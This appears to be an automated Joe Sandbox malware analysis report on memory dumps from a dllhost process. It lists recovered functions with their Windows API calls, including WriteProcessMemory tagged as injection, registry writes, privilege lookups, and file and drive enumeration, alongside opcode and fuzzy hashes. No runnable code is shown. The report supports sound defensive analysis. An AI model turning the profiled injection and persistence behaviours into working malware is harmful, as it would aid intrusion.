Opcode ID: 529ad3a21c9ba239784d48f0ce62dd8ca33894e6cbe452ac599914970e79b4df
Instruction ID: d5df7f11b8bc41552537dcef8c6c539e419598f22cbc4895f1a83afb39340cee
Opcode Fuzzy Hash: 529ad3a21c9ba239784d48f0ce62dd8ca33894e6cbe452ac599914970e79b4df
Instruction Fuzzy Hash: 4E21487140E3C09FD7038B258C65A92BFB4EF47224F0A84DBD985CF1A3D2696809CB72

Function 0083B662 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0083B6D5

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 2a558002a8193e02150d31cd0858b61ec2363f31509d611d5e40190c604107f7
Instruction ID: 79c4bbdd90250142a8839aa2abd09003b74c8b75a798614bc8c0a509d1888314
Opcode Fuzzy Hash: 2a558002a8193e02150d31cd0858b61ec2363f31509d611d5e40190c604107f7
Instruction Fuzzy Hash: 582195B55042449FE710DF65CD46B66F7E8EF54314F04846AEE44CB252E375E904CAB2

Function 0083AA52 Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,00000E24,E69DB018,00000000,00000000,00000000,00000000), ref: 0083AAD1

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: acb9a478f1d4ffa06a730d3ac7459f81e2404f7250f9b6f5f9eb7d490c06fb15
Instruction ID: b6f075e038cff3ce996a66cb9abaaa982be481e4c5bc3b04872a37aa15e0e332
Opcode Fuzzy Hash: acb9a478f1d4ffa06a730d3ac7459f81e2404f7250f9b6f5f9eb7d490c06fb15
Instruction Fuzzy Hash: E9218076409780AFE722CF51DC44F67FFB8EF45324F08849AE9859B152D275A508CBB2

Function 0083AF76 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,E69DB018,00000000,00000000,00000000,00000000), ref: 0083AFF0

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a621379d9f0b79d1193d50414a8753386f7b67270223da75f0e03503b64cd614
Instruction ID: c92b1fea920decada5f67e0db31adf344edbad229c76224ed2c7c753009f19b2
Opcode Fuzzy Hash: a621379d9f0b79d1193d50414a8753386f7b67270223da75f0e03503b64cd614
Instruction Fuzzy Hash: 5A218EB95046049FE721CF15CC85F67F7ECEF44714F08845AEA45CB252D764E948CAB2

Function 0083A589 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0083A608

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 57b2684dd7830ca74796cd4f9015c877a7eb1c39944716662cad6731b5ad1ec4
Instruction ID: e02d24a8e61f6d295353459c147cda82391fab9a75bec320989573854c99a342
Opcode Fuzzy Hash: 57b2684dd7830ca74796cd4f9015c877a7eb1c39944716662cad6731b5ad1ec4
Instruction Fuzzy Hash: A4218B754097C09FDB228F21DC44A52FFB4EF5B210F0D84DAE9848B1A3D265A949DB62

Function 0083ADE8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0083AE56

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: d0b345d7ab770cc256a18e41fdbb131fa33b1bd5f1405c7d2d2cabd775662ffb
Instruction ID: d8f069960386e99f5d4bc73e035954d335bbf158da86ce28a7b93cb7f633a410
Opcode Fuzzy Hash: d0b345d7ab770cc256a18e41fdbb131fa33b1bd5f1405c7d2d2cabd775662ffb
Instruction Fuzzy Hash: 2F2193715093805FDB11CF65DC45B53BFE8EF46210F0884AAEC85CB262D224E808CB61

Function 0083B06A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E24,E69DB018,00000000,00000000,00000000,00000000), ref: 0083B0DC

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7c27180472383e709b26fe197b48be81941d06c26599e3a45561efe00ce35283
Instruction ID: 6beb2509f1ae64f5918a01f3c9aeef614668edd355383dffc19b6a675b2cfe4a
Opcode Fuzzy Hash: 7c27180472383e709b26fe197b48be81941d06c26599e3a45561efe00ce35283
Instruction Fuzzy Hash: C81181B5504A04AFEB218E15CC85B6BFBE8EF44714F04845AEE45DB251D374E904CAB2

Function 0083B1C6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0083B22E

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7e4b23e3cc1bb9a30ebe38faa37d2d240ee52cb604d285acc607ea12c6bf52a8
Instruction ID: 47d1c101f3c131158fda9407f77747b647514b88fae90609427a8877bdbbe7f5
Opcode Fuzzy Hash: 7e4b23e3cc1bb9a30ebe38faa37d2d240ee52cb604d285acc607ea12c6bf52a8
Instruction Fuzzy Hash: 83118EB2605380AFDB21CF25DC45B57BFE8EF55620F0884AAED45CB252D265E808CBA1

Function 0083AA72 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,E69DB018,00000000,00000000,00000000,00000000), ref: 0083AAD1

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ca58472d2d15f8043711c54796a0b26a522a452324525baad269f8787c25b973
Instruction ID: eb88c4c4c577640e190221c28b57cdb444fc94b8fb26843ae31978875601f93d
Opcode Fuzzy Hash: ca58472d2d15f8043711c54796a0b26a522a452324525baad269f8787c25b973
Instruction Fuzzy Hash: 6511EF76404604AFEB21CF51CD44FAAFBE8EF44324F08885AEA45CB251D375A408CBF2

Function 0083A63B Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0083A6A8

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: fd6a063f3aa3cce6f3af3544c9e8d30559b70f7ab4f7cf2d8ae4bba3a22485c2
Instruction ID: 1ba8ed6d0268ddb2631659b1679b5e434503fe7cc4683b351ba57f640aa7e8cc
Opcode Fuzzy Hash: fd6a063f3aa3cce6f3af3544c9e8d30559b70f7ab4f7cf2d8ae4bba3a22485c2
Instruction Fuzzy Hash: EC11D0B540D7C05FDB128B21DC45692BFB4EF47324F0984DBDC898F163D264A909CBA2

Function 0083AE0E Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0083AE56

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: c826e8c9950a6d828a9847d19c8fb79acf160eaec9fe8802cea244dc03ed2f60
Instruction ID: f2427200e7f73ea827a04687503bbf5526249b4294e68b70df503b5df24f0e72
Opcode Fuzzy Hash: c826e8c9950a6d828a9847d19c8fb79acf160eaec9fe8802cea244dc03ed2f60
Instruction Fuzzy Hash: 2C1182756042408FEB54CF55D945756FBD8EF44724F08846AED45CB251D335E804CAA2

Function 0083B1E6 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0083B22E

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c826e8c9950a6d828a9847d19c8fb79acf160eaec9fe8802cea244dc03ed2f60
Instruction ID: 98e8881dbf6a1c452893d07c2718983e186a3487d46946bd44da3afcfc53e21b
Opcode Fuzzy Hash: c826e8c9950a6d828a9847d19c8fb79acf160eaec9fe8802cea244dc03ed2f60
Instruction Fuzzy Hash: AE11E5B16042008FEB10CF19DC45757FBD8EF44320F08C5AADE05CB652D335E804CAA1

Function 0083AC8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0083ACE0

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 4b300ab1df9af99c3ee93d9098d947191b515fa3738259e709ba71e1e91b5f02
Instruction ID: 06be2e98fd9896396d7e69877e89adcd9e80f71618bd1566e591a205b1169ea9
Opcode Fuzzy Hash: 4b300ab1df9af99c3ee93d9098d947191b515fa3738259e709ba71e1e91b5f02
Instruction Fuzzy Hash: F611A5755093809FDB128F15DC85B52FFB4DF46221F0880DBED858B6A3D265A908CBA2

Function 0083A8E2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,E69DB018,00000000,00000000,00000000,00000000), ref: 0083A935

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 5b0c963ad448ab3e8128527be4d6549a8c6962116abeb34dc2f0c0fa464777f2
Instruction ID: 0a4f7dc02db2a9ea9ac4021f0ca8ca7e27eef5c0f65467f5d8cba5e01ad9cac5
Opcode Fuzzy Hash: 5b0c963ad448ab3e8128527be4d6549a8c6962116abeb34dc2f0c0fa464777f2
Instruction Fuzzy Hash: 0C01C479504604AEE720CF05DC45BAAFB9CEF44724F14C09AEE449B251D378A9048AF2

Function 0083A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0083A1C2

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 3cd38bb73b4798c7c2df719fe838af9b930e26f1dcdf39ca5b1778f650e6935a
Instruction ID: 1969754c669e53fbd5ce64ead0bd75a7b780684f39786baf7be5f4d2c459dace
Opcode Fuzzy Hash: 3cd38bb73b4798c7c2df719fe838af9b930e26f1dcdf39ca5b1778f650e6935a
Instruction Fuzzy Hash: 1D0171B1500200ABD310DF16DD45B76FBE8EB88A24F14856AED089B741E735F915CBE6

Function 0083A5C2 Relevance: 1.5, APIs: 1, Instructions: 43injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0083A608

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 31817f5f6ef9471dc58de3d82ae1534f5d823f86576cf72380fc87b1ad37adb8
Instruction ID: 8b982c53e81e5d4e6e0e50487acacdaf4fb36e7458919dee8446cfbb57cd648d
Opcode Fuzzy Hash: 31817f5f6ef9471dc58de3d82ae1534f5d823f86576cf72380fc87b1ad37adb8
Instruction Fuzzy Hash: 9801AD754002008FEB20CF05D885B62FBE4FF58314F08849ADE858B262D331E858DAA2

Function 0083ACAE Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0083ACE0

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 57195883d5f30c0a4aa281c16e83ea135ec87db45da9ff5570b14a5ca58dd865
Instruction ID: ab6cbec5355ad3ac11d3dc647c822b50826e8d98a6ce30a86d403fa81ca2d684
Opcode Fuzzy Hash: 57195883d5f30c0a4aa281c16e83ea135ec87db45da9ff5570b14a5ca58dd865
Instruction Fuzzy Hash: 5E01DC755042448FEB248F1AD985762FBE4EF84325F08C0AADD498B652D375E808DAE2

Function 0083AD72 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 0083ADA1

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: 0fadae797a53229b03687e337c93732c860f93d8e9ef4b16583b1b9dd791a2c3
Instruction ID: 1959c585595a943c71d99c4587fc7b46c4f7d9f43e3caadad9887d0ebb3dfe6a
Opcode Fuzzy Hash: 0fadae797a53229b03687e337c93732c860f93d8e9ef4b16583b1b9dd791a2c3
Instruction Fuzzy Hash: 6901D1704042448FEB10CF15D985796FBE4EF84325F08C4AADD49CF656D3B5A804CBE2

Function 0083A676 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0083A6A8

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b540d6c6bfb26dfc4eaf4a8c25b72d610b7c28c760b859458e98e02ad42e567f
Instruction ID: 76b65532b80faebaa240708f4c424ca22205a836454d1f23bab6a9877fcd8de6
Opcode Fuzzy Hash: b540d6c6bfb26dfc4eaf4a8c25b72d610b7c28c760b859458e98e02ad42e567f
Instruction Fuzzy Hash: CCF0D1744042448FEB108F06D986761FBE0EF54324F0CC09ADD458B252E375E814CAA2

Function 04BC07C7 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

2, xrefs: 04BC07FD

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 2c99df4093f4c9168ea19a3d1ae6b056d70e49dde138c1f05be350ef5e874f7c
Instruction ID: b96ed233fde4146f1180e6cb5a5222902efb76fffb25b24c7200c1d7d13ea397
Opcode Fuzzy Hash: 2c99df4093f4c9168ea19a3d1ae6b056d70e49dde138c1f05be350ef5e874f7c
Instruction Fuzzy Hash: 355185A3D09384DBC3017BE864DD6CEFFE4DAA6208F1E449BCD849A103F1645A1B9783

Function 0083B3FC Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0083B468

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7aacdb2ecd9e0c772e03b95747dbfeffdba6834d12fe9d6e8e25469b628eabb7
Instruction ID: ec36753f80ae5419272b95014ff86f2457cbece651401b53ad338e77f573bf91
Opcode Fuzzy Hash: 7aacdb2ecd9e0c772e03b95747dbfeffdba6834d12fe9d6e8e25469b628eabb7
Instruction Fuzzy Hash: BA21AEB25093C05FDB128B25DC54792BFB4EF47324F0984DAED858F263D265A908CBA2

Function 0083A3C0 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0083A414

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cd027e7290a30e9aed2db00bd0a863f4aafc9c5b066b99c7e921a8c6c4cc3b58
Instruction ID: 92c4a476fdf091ea26e3baec3830c698eb8d9f0651b4b3e6867afbf6ff3ed2dc
Opcode Fuzzy Hash: cd027e7290a30e9aed2db00bd0a863f4aafc9c5b066b99c7e921a8c6c4cc3b58
Instruction Fuzzy Hash: 4E11A7715093809FDB128F15DC94752BFB4EF46220F0884DBED85CF653D275A818CB62

Function 0083B436 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0083B468

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d285b17623e32c9dce10c79ff52fe3ffbfc786694fe33230341c1c87ec12c49d
Instruction ID: c1254836ee1f538801bb3db7ca2b179e8e35ccc96a979a6c9408064ddd3fcc8c
Opcode Fuzzy Hash: d285b17623e32c9dce10c79ff52fe3ffbfc786694fe33230341c1c87ec12c49d
Instruction Fuzzy Hash: B201D4B19042408FDB10CF15D985752FBE4EF84324F08C4AADE09CF256D375E814CBA6

Function 0083A3E2 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0083A414

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0cb02e1f3c34283c509f36a033d80a48a197377948035f570468c928c4ed28b6
Instruction ID: 5d78be2041caa49129efd983075c236de5cf8814ea97e0772feec74d1072f97d
Opcode Fuzzy Hash: 0cb02e1f3c34283c509f36a033d80a48a197377948035f570468c928c4ed28b6
Instruction Fuzzy Hash: BC01DF755042408FEB10CF15D9897A6FBE4EF84324F08C4ABDD49CF252D2B5E818CAA2

Function 048510DE Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

|, xrefs: 0485392A

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 5c79d679cfb5955b2c28c71a4e820e077d9d1facab0ba6504f4d5a99e3607d35
Instruction ID: 2f32d8079d46b6854adcbad6f28d4c05669ec5c2104ef7cc030ed90947d8a9f2
Opcode Fuzzy Hash: 5c79d679cfb5955b2c28c71a4e820e077d9d1facab0ba6504f4d5a99e3607d35
Instruction Fuzzy Hash: 37F0C875B0C264CBE7144F6488143AC37A4AB06358F0847E6DC05DB2A1DB759D05CFD7

Function 04BC0295 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 04BC02C3

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 5cd84e75054eee70b8077bd6d8e83b116a47c062435b6c02db49b268e11dc84e
Instruction ID: 1db91531b81179db6ebd12bbbb49edb4db2d6d9f7551c246962bb91e0d85ac75
Opcode Fuzzy Hash: 5cd84e75054eee70b8077bd6d8e83b116a47c062435b6c02db49b268e11dc84e
Instruction Fuzzy Hash: CDE08670E05248CBEF04EFE9D58429DB7F2FF45304F50886AD506D7254EB7859048F02

Function 04BC010A Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

K, xrefs: 04BC0136

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: bb43ca48fa7e203ee099beb99f2f3e9e958540b56860a4d77ff550fb4b80c86a
Instruction ID: 9983ae9ea25c058dbda2a6f43d9a596c6f0ac9be841b4e77f61b478f5904b572
Opcode Fuzzy Hash: bb43ca48fa7e203ee099beb99f2f3e9e958540b56860a4d77ff550fb4b80c86a
Instruction Fuzzy Hash: C0E08674E05205CFEB04FFF4D58429DB7B2FF41344F508859E506D7214EB3899148A06

Function 04850372 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

9, xrefs: 048556AC

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 98cb592e17e8fd615417ec778981e8313c077cca5e0fb8dbf2d555ad426cdb8f
Instruction ID: c50d0f93e97eb6a7b360fb68de2133db8c07b3b022e6639a5c0093645ac08c21
Opcode Fuzzy Hash: 98cb592e17e8fd615417ec778981e8313c077cca5e0fb8dbf2d555ad426cdb8f
Instruction Fuzzy Hash: 1EE0CDB56045A5DFF7515F18982534C37D4BB04354F1449D7DC01DB252DB791E019F47

Function 04BC09AE Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

V, xrefs: 04BC09C6

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 643be7f8614a197ecadde02f1b9cb7ea236b2e3af6fbb7a0db635ccc8ad663ed
Instruction ID: adf640fec32f97e8d9d90a13c70904c417fc0410ba48850a35d8a705d6d84227
Opcode Fuzzy Hash: 643be7f8614a197ecadde02f1b9cb7ea236b2e3af6fbb7a0db635ccc8ad663ed
Instruction Fuzzy Hash: 74E04638A05249CBEF40AFE4D99829EB7A1EB05304F50485AEA02DB250EA785A548A06

Function 04BC037E Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

d, xrefs: 04BC03A3

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 117d2325766d668e80067763c88832102f6711bc9341bfd8a9fa671c03bd2c41
Instruction ID: d81df19cf458ceb36a8793215396e5a1ca524fe16cc274a3200667a013b87ad4
Opcode Fuzzy Hash: 117d2325766d668e80067763c88832102f6711bc9341bfd8a9fa671c03bd2c41
Instruction Fuzzy Hash: 81D0A734A05385CBD7415BA0892538C7BE19F01240F84855AC086DB351DE7908194B41

Function 04BC0639 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

/, xrefs: 04BC065E

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: f98f7902c2771e03c5f17b50cd5f3222eb88a32b24153ea6a647ee8b51b00c19
Instruction ID: 034efce2e53d05043f2b092b7c6b3927cc2fead4501b43adaae9c26cb9758e9e
Opcode Fuzzy Hash: f98f7902c2771e03c5f17b50cd5f3222eb88a32b24153ea6a647ee8b51b00c19
Instruction Fuzzy Hash: 76D0A73490B28A8FDB01DBB4841929C7FF0AF07210F9045D68496DB2B3EE38581DD701

Function 04BC0222 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

(, xrefs: 04BC0237

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 86d21e4b829bc264c04c1c09272735e8f1c9248e9296636fdcc73c27cdfa3448
Instruction ID: 050c46a74a0a60037a0271388f8ed861af0ba2e25c83d14bb0ace58972f3c5bf
Opcode Fuzzy Hash: 86d21e4b829bc264c04c1c09272735e8f1c9248e9296636fdcc73c27cdfa3448
Instruction Fuzzy Hash: 13D0C734A06248CBDF44EFD4D1941DD77F2EB45300F50485AD106D7355DA385D549B41

Function 04BC08B8 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

E, xrefs: 04BC08D0

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 138a2fb0a1fc458678ad8439acb19a29175920ab0ca97c7d48842708b3efe65f
Instruction ID: 7970876c57cf5a3caaf6e47354cf8d1581c1a895fb085f681cdf5a9dbe2ebcfe
Opcode Fuzzy Hash: 138a2fb0a1fc458678ad8439acb19a29175920ab0ca97c7d48842708b3efe65f
Instruction Fuzzy Hash: 62C08C70A01104CBEB80AFE0881839C76B1AB00300F808459400AE7390EE7809008F11

Function 04BC0436 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

), xrefs: 04BC044E

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

